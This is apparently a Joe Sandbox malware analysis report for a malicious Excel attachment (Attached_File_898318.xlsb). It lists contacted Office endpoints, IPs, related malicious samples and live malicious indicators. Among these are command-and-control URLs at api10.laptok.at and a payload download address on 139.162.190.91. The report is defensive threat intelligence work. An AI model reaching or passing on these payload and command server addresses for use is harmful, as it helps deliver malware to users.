      http://api10.laptok.at/api1/_2B3EC16o/ZAwFGYF9Vidd2jOtlAgm/mFihH4UJ9WRC5w2li3g/OmibLsmZh5kJggmEaLzXRw/GA804i0H_2FW_/2Bkfn2No/zd0HyzP1MHF3zy0EvBK150W/_2B_2F72Dj/XoTXOXEzn6drW_2F_/2Bb7rN2KKcCZ/KiFeG39_2BW/irWAdzICnBHe9A/JQjcMLSav9jkNFGwHtKAG/2eL5LYIsSV49BFxc/6fK4w6t6KL1u4HS/P5vv5cRA4KCaKMNSZL/6ARUH9_2F/EAxxwtglWrZsl5pAsfsN/hmQH9PGx0xVYwlQOUAn/SkTHJd4lg4vDyhmkAnMXCm/mjKfMaxW9/ggDtMvzus/3jtrue
      • Avira URL Cloud: safe
      unknown
      http://api10.laptok.at/api1/quWyI8WCkgN/SXUvWGfiUm7T0f/lzSlHf7sO503xATuzHkPG/Uh6KISBL5d4ngtXF/8CCWBl9aRux0ggg/WjpeRnlHlxQpgYHWF7/SRgr07KRV/r5lQqK3B6jZkHZiIL4cT/yujdqTpvuL8V1NlvglB/sTzNC3Gtg_2Bwr4uzl4_2F/AC089ktgtaMkN/4Kgt2RLr/Ke14XkQchJOlvOHrYVkVyXU/P0CMvsMir5/NwrpznNArerCa8bkI/55ua2Ge0fpbQ/9kzo82khbwL/WEPiqQPRb97B8a/81xN3oY2Fv8ECPICx_2Be/nWcE6nEvng8OxAW2/XsEKKCKa1AcTuvo/ktrue
      • Avira URL Cloud: safe
      unknown
      http://api10.laptok.at/favicon.icotrue
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.com8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
        high
        https://login.microsoftonline.com/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
          high
          https://shell.suite.office.com:14438F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
            high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
              high
              https://autodiscover-s.outlook.com/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                high
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                  high
                  https://cdn.entity.8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://api.addins.omex.office.net/appinfo/query8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                    high
                    https://wus2-000.contentsync.8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://clients.config.office.net/user/v1.0/tenantassociationkey8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                      high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                        high
                        https://powerlift.acompli.net8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.com8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://lookup.onenote.com/lookup/geolocation/v18F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                          high
                          https://cortana.ai8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                            high
                            https://cloudfiles.onenote.com/upload.aspx8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                              high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                high
                                https://entitlement.diagnosticssdf.office.com8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                  high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                    high
                                    https://api.aadrm.com/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                      high
                                      https://api.microsoftstream.com/api/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                        high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                          high
                                          https://cr.office.com8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                            high
                                            https://portal.office.com/account/?ref=ClientMeControl8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                              high
                                              https://ecs.office.com/config/v2/Office8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                high
                                                https://graph.ppe.windows.net8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                  high
                                                  https://res.getmicrosoftkey.com/api/redemptionevents8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://powerlift-frontdesk.acompli.net8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://tasks.office.com8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                    high
                                                    https://officeci.azurewebsites.net/api/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                    • 0%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/work8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                      high
                                                      https://store.office.cn/addinstemplate8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://wus2-000.pagecontentsync.8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                        high
                                                        http://139.162.190.91/campo/a/a.Dsheet9.binfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://globaldisco.crm.dynamics.com8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                          high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                            high
                                                            https://store.officeppe.com/addinstemplate8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://dev0-api.acompli.net/autodetect8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.odwebp.svc.ms8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://api.powerbi.com/v1.0/myorg/groups8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                              high
                                                              https://web.microsoftstream.com/video/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                high
                                                                https://graph.windows.net8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                  high
                                                                  https://dataservice.o365filtering.com/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://officesetup.getmicrosoftkey.com8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://analysis.windows.net/powerbi/api8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                    high
                                                                    http://majorleave.net2200[1].dll.0.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://prod-global-autodetect.acompli.net/autodetect8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://outlook.office365.com/autodiscover/autodiscover.json8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                      high
                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                        high
                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                          high
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                            high
                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                              high
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                high
                                                                                http://weather.service.msn.com/data.aspx8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                  high
                                                                                  https://apis.live.net/v5.0/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                    high
                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                      high
                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                        high
                                                                                        https://management.azure.com8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                          high
                                                                                          https://incidents.diagnostics.office.com8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                            high
                                                                                            https://clients.config.office.net/user/v1.0/ios8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/odc/insertmedia8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                high
                                                                                                https://o365auditrealtimeingestion.manage.office.com8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com/api/v1.0/me/Activities8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                    high
                                                                                                    https://api.office.net8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnosticssdf.office.com8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                        high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policies8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.com8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office.com/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                high
                                                                                                                https://storage.live.com/clientlogs/uploadlocation8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                  high
                                                                                                                  https://templatelogging.office.com/client/log8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                      high
                                                                                                                      https://webshell.suite.office.com8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                          high
                                                                                                                          https://management.azure.com/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                            high
                                                                                                                            https://ncus-000.contentsync.8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://login.windows.net/common/oauth2/authorize8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                              high
                                                                                                                              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://graph.windows.net/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                                high
                                                                                                                                https://api.powerbi.com/beta/myorg/imports8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://devnull.onenote.com8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://messaging.office.com/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://augloop.office.com/v28F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://skyapi.live.net/Activity/8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/mac8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://dataservice.o365filtering.com8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://api.cortana.ai8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://onedrive.live.com8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drfalse
                                                                                                                                                  high

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  35.228.31.40
                                                                                                                                                  unknownUnited States
                                                                                                                                                  15169GOOGLEUStrue
                                                                                                                                                  139.162.190.91
                                                                                                                                                  unknownNetherlands
                                                                                                                                                  63949LINODE-APLinodeLLCUSfalse
                                                                                                                                                  192.185.16.102
                                                                                                                                                  unknownUnited States
                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                  Analysis ID:350713
                                                                                                                                                  Start date:09.02.2021
                                                                                                                                                  Start time:18:40:43
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 6m 44s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:light
                                                                                                                                                  Sample file name:Attached_File_898318.xlsb
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Number of analysed new started processes analysed:27
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.expl.evad.winXLSB@6/10@4/3
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 24% (good quality ratio 23.3%)
                                                                                                                                                  • Quality average: 80.1%
                                                                                                                                                  • Quality standard deviation: 27.2%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 71%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsb
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, RuntimeBroker.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, ielowutil.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 104.43.193.48, 13.64.90.137, 40.88.32.150, 52.109.88.177, 104.42.151.234, 52.109.76.33, 52.109.12.22, 52.109.12.24, 51.11.168.160, 13.88.21.125, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 51.103.5.186, 52.155.217.156, 20.54.26.129, 51.104.144.132, 184.30.24.56, 88.221.62.148
                                                                                                                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, go.microsoft.com, emea1.wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  No context

                                                                                                                                                  Domains

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  api10.laptok.atPresentation_68192.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 47.89.250.152
                                                                                                                                                  sup11_dump.dllGet hashmaliciousBrowse
                                                                                                                                                  • 45.138.24.6
                                                                                                                                                  out.dllGet hashmaliciousBrowse
                                                                                                                                                  • 45.138.24.6
                                                                                                                                                  crypt_3300.dllGet hashmaliciousBrowse
                                                                                                                                                  • 45.138.24.6
                                                                                                                                                  SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dllGet hashmaliciousBrowse
                                                                                                                                                  • 45.138.24.6
                                                                                                                                                  3a07d9bd-1b72-4b18-a990-8f53801474f5.vbsGet hashmaliciousBrowse
                                                                                                                                                  • 47.241.19.44
                                                                                                                                                  0HsPbXmcFf1k.vbsGet hashmaliciousBrowse
                                                                                                                                                  • 47.241.19.44
                                                                                                                                                  0LC6H9UPa7cv.vbsGet hashmaliciousBrowse
                                                                                                                                                  • 47.241.19.44
                                                                                                                                                  0AQ7y0jQVHeA.vbsGet hashmaliciousBrowse
                                                                                                                                                  • 47.241.19.44
                                                                                                                                                  3a07d9bd-1b72-4b18-a990-8f53801474f5.vbsGet hashmaliciousBrowse
                                                                                                                                                  • 47.241.19.44
                                                                                                                                                  5Dk2HB4IS3dn.vbsGet hashmaliciousBrowse
                                                                                                                                                  • 47.241.19.44
                                                                                                                                                  JFCp0yRoUS1z.vbsGet hashmaliciousBrowse
                                                                                                                                                  • 47.241.19.44
                                                                                                                                                  kj3D6ZRVe22Y.vbsGet hashmaliciousBrowse
                                                                                                                                                  • 47.241.19.44
                                                                                                                                                  onerous.tar.dllGet hashmaliciousBrowse
                                                                                                                                                  • 47.241.19.44
                                                                                                                                                  0xyZ4rY0opA2.vbsGet hashmaliciousBrowse
                                                                                                                                                  • 47.241.19.44
                                                                                                                                                  6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                                                                                                                  • 47.241.19.44
                                                                                                                                                  JeSoTz0An7tn.vbsGet hashmaliciousBrowse
                                                                                                                                                  • 47.241.19.44
                                                                                                                                                  1qdMIsgkbwxA.vbsGet hashmaliciousBrowse
                                                                                                                                                  • 47.241.19.44
                                                                                                                                                  2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                                                                                                                  • 47.241.19.44
                                                                                                                                                  0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                                  • 47.241.19.44

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  LINODE-APLinodeLLCUSv1K1JNtCgt.exeGet hashmaliciousBrowse
                                                                                                                                                  • 96.126.109.101
                                                                                                                                                  Order 8953-PDF.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.118.132.153
                                                                                                                                                  index_2021-02-08-19_41.dllGet hashmaliciousBrowse
                                                                                                                                                  • 69.164.207.140
                                                                                                                                                  SecuriteInfo.com.Trojan.Dridex.735.19015.dllGet hashmaliciousBrowse
                                                                                                                                                  • 69.164.207.140
                                                                                                                                                  57JXmQhiof.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.79.142.211
                                                                                                                                                  MPg2bmWL2M.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.79.142.211
                                                                                                                                                  PO-3170012466.exeGet hashmaliciousBrowse
                                                                                                                                                  • 96.126.123.244
                                                                                                                                                  Rf1jy0FVcu.exeGet hashmaliciousBrowse
                                                                                                                                                  • 176.58.123.25
                                                                                                                                                  wl0mBiXkW1.exeGet hashmaliciousBrowse
                                                                                                                                                  • 85.159.214.61
                                                                                                                                                  hFsSNJ3Bvz.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.79.142.211
                                                                                                                                                  PFxtDfOJtu.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.79.142.211
                                                                                                                                                  MHIOfpMMs9.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.79.142.211
                                                                                                                                                  RJVPg3z2Pu.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.79.142.211
                                                                                                                                                  opgVccK0a8.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.79.142.211
                                                                                                                                                  4Sl5ivG70m.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.33.89.196
                                                                                                                                                  Attach-1851392551-HN2104490797.xlsGet hashmaliciousBrowse
                                                                                                                                                  • 45.79.142.211
                                                                                                                                                  Attach-1608315908-HN886976831.xlsGet hashmaliciousBrowse
                                                                                                                                                  • 45.79.142.211
                                                                                                                                                  PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                                                                                                  • 139.162.21.249
                                                                                                                                                  ST33MQz3ZZ47fFjr8g09.exeGet hashmaliciousBrowse
                                                                                                                                                  • 178.79.168.215
                                                                                                                                                  ST33MQz3ZZ47fFjr8g09.exeGet hashmaliciousBrowse
                                                                                                                                                  • 178.79.168.215
                                                                                                                                                  GOOGLEUS5ncC1M3Cch.exeGet hashmaliciousBrowse
                                                                                                                                                  • 74.125.203.99
                                                                                                                                                  BsjoR9T7ul.apkGet hashmaliciousBrowse
                                                                                                                                                  • 216.58.207.163
                                                                                                                                                  5DktGbEvIA.apkGet hashmaliciousBrowse
                                                                                                                                                  • 172.217.20.238
                                                                                                                                                  5DktGbEvIA.apkGet hashmaliciousBrowse
                                                                                                                                                  • 172.217.20.238
                                                                                                                                                  packing list.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 34.102.136.180
                                                                                                                                                  mal.apkGet hashmaliciousBrowse
                                                                                                                                                  • 216.239.35.0
                                                                                                                                                  RFQ - ASTROFREIGHT FEB21-0621pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 34.102.136.180
                                                                                                                                                  LIFE BOAT WIRE FALLS.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 34.102.136.180
                                                                                                                                                  SecuriteInfo.com.Generic.mg.f7b0e629e591f372.exeGet hashmaliciousBrowse
                                                                                                                                                  • 34.102.136.180
                                                                                                                                                  SOA - NCL INTER LOGISTICS.pptGet hashmaliciousBrowse
                                                                                                                                                  • 172.217.23.33
                                                                                                                                                  ABN RM753.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 34.102.136.180
                                                                                                                                                  PO 2420208 .pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 34.102.136.180
                                                                                                                                                  dhl.apkGet hashmaliciousBrowse
                                                                                                                                                  • 172.217.20.238
                                                                                                                                                  Order 8953-PDF.exeGet hashmaliciousBrowse
                                                                                                                                                  • 34.102.136.180
                                                                                                                                                  PURCHASE ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 34.102.136.180
                                                                                                                                                  PROFOMA INVOICE pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 34.102.136.180
                                                                                                                                                  jFLKa34zZb.exeGet hashmaliciousBrowse
                                                                                                                                                  • 34.102.136.180
                                                                                                                                                  VgO6Tbd7Rx.exeGet hashmaliciousBrowse
                                                                                                                                                  • 34.102.136.180
                                                                                                                                                  nw6o9XFk5F.apkGet hashmaliciousBrowse
                                                                                                                                                  • 216.239.35.4
